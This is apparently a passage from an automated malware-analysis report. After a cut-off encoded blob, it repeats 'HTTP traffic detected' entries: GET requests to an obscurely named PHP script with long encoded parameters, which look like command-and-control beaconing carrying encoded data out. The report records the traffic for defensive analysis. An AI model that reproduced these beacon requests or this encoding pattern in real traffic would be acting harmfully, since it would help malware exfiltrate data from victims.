wUFVPpmTqlVaGpWSzlUaUl2bqlUMJRkWs5kMZlXUU1EaGRlTykkMNp3YU9EeZpnT1kUbOJTWq5EaadkW1kFVa1mWt5EaoRlW4l0QMlGNrlkNJNkTpRGValmTXpFeNdlT6lFRNNTUX9EeN1WW0k1RaBTWqpleFpXTspEVOh3Yq5EenpmW0MGRPl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaj1mYwJEWaxGeyUVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJlmYxoEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3F
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXaJ9kSp9UaJdkTrp0VPdXTtpFaOd1TxUlMNxmV61EaSdlWqJ1VZtmSqpVNFR1ToplaaNTSX5UaOpWW5lVbJNXSpRVavpWSt5kaaxmSqp1aO1mW1cmaZlmQq10aGdVW3VlMONzZ6lFeJdkW5lERPFTSX1UNnpWTxEFRNlmSDxUa0sWS2k0UPhmRt5EeBRlTtxGVaNzZ65ENZpWW0k1RPFTVqpleVdVTxsmaOBzZU9UeFpmTykEROhmVy0Ua3lWSPpUaPlWVt1UbSRUT610VNdXVyk1akRlTzkkaOhmWH1UboR0TxkFVZNTSH9UeBpWW4lEVOlXTE1UbKpWSzlUaUl2bqlEakRkTyMGVORzaE5UNZpXWtZERPpmRE10aCpWTzUkMOpXTUllMnRlT1UUbZVza65UMRRkWpp0QMlGNrlkNJNVTsZFVOlmQUllMZRVTycGVZh3aU50MNd1T3lEROpXWE5UaCpnTsZEVNlXSq50MVRUTxk1VOl2dpl0TKl2TplERPp3Z61UMBRUToxmaZtmWt50dNd0T1E1VNhGaUl1aadUTpp1VapXRtl1dZJTWsJVbNVTSql0cJlGVp9maJBTRql1dFdkWpRGROVTUU5EbGRVTtZlMZp3aU90dZpWWtZ1RN1mTU5UMJRkW5FVbNdXTE10MJNETpRzaJZTSp5EaKpmWykFROpXUUpleZ1mT4tGRPtmSU5kMNdlW00ERalmRE5EeFdVT4dGRaBTVt5EasRlTpdXaJ9kSp9UajRlTxE1RPpXW61EaGR0ToZkeOlXRU5UbSdUTwElMOtmSH9UerpXT00kaalXRt1ENNRlWzElaJNXSpRVavpWS0EEVZlmTH1ENJpXWyEFVORzY6llaapWW1UFVNFTUq50dV1mTzUFVZRTVX9UaspnT4VkMZBTSDxUa0sWS2kUaZxmRXlFNnpWW3FEVZtGZ65UaSRUToZ1RONTTU9kMJRVT5lEVOhmWU5EeVRkWrZ1VOJTRtpVa3lWSPpUaPlWWE5EaGdVWqZkeONTSt50dNdkT3tmaNVTRq5UNJR0ToRGVNhmWXpFNRdkT5VlaNhXUykVeV1WSzlUaUl2bqlUeZRVTo5keZhmSE1UaOdUTyE1VahmRH9keNpmWrxGVPpXQql1dJpmWzcGRNxmUq10dRdlWpp0QMlGNrlkNJlXT3llMOlmTyk1djRkT6lkaaFTVtpFNBRkWpZleNdXUX5UeFR0T1EkaNhXTykFbCpmT6NmaOl2dpl0TKl2TpFVbNhmTH10MZdkW4tmeZl3Z6l1dNdlT310RPhGZq1kerpmWtJleONTVX5EMVR1Tq5kaZlmRql0cJlGVp9maJFTSEpFbOJTW5FFVNhmRU5kMJJTT6NGVPhXW65UNJ1mTyklaOhmWHpVNZRlWtpVbOhGaUpFeJNETpRzaJZTSD5UakRlWp50VahXTX5keZRUTzE1VPhXTtlFNZdkWwklaapXR61EbKRlT4NmaOh3ZqpFNjR0TpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVds